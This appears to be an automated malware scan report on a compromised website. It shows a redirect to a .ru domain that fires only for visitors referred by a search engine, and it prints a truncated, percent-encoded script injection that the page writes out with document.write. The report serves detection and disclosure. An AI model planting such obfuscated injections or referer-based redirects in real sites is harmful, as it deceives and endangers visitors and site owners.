Malicious/Suspicious Redirects
URL: http://cormacproductions.com/ (imitation of visitor from search engine)
Status: malicious

Request:
GET / HTTP/1.1
Host: cormacproductions.com
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 08 Jun 2014 06:13:06 GMT
Location: http://genzasenetr.ru/zoviz?11
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Scanned pages/files
Request | Server response | Status |
http://cormacproductions.com/ | 200 OK Content-Length: 17900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var mytpcba='%3c%21%2d%2d%2d%2d%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%0a%2f%2f%52%65%6c%65%61%73%65%20%31%2e%30%0a%76%61%72%20%61%20%20%3d%20%27%3c%73%74%72%6f%6e%67%3e%6b%69%74%20%67%72%61%70%68%69%71%75%65%20%67%72%61%74%75%69%74%3c%2f%73%74%72%6f%6e%67%3e%20%73%75%72%20%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6b%69%74%73%67%72%61%74%75%69%74%73%2e%63%6f%6d%2f%22%3e%3c%73%74%72%6f%6e%67%3e%6b%69%74%20%67%72%61%70%
document.write(unescape(mytpcba));
Antivirus reports:
http://cormacproductions.com/js/AC_RunActiveContent.js | 200 OK Content-Length: 16722 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/jquery121.js | 200 OK Content-Length: 27147 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/sound.js | 200 OK Content-Length: 1227 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/main.js | 200 OK Content-Length: 5996 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/prototype.js | 200 OK Content-Length: 47603 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/scriptaculous.js?load=effects | 200 OK Content-Length: 2152 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/lightbox.js | 200 OK Content-Length: 23859 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Jun 2014 06:13:11 GMT Location: http://genzasenetr.ru/zoviz?11 Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://genzasenetr.ru/zoviz?11 | 500 Can't connect to genzasenetr.ru:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
http://genzasenetr.ru/test404page.js | 500 Can't connect to genzasenetr.ru:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cormacproductions.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cormacproductions.com/
Result: cormacproductions.com is not infected or malware details are not published yet.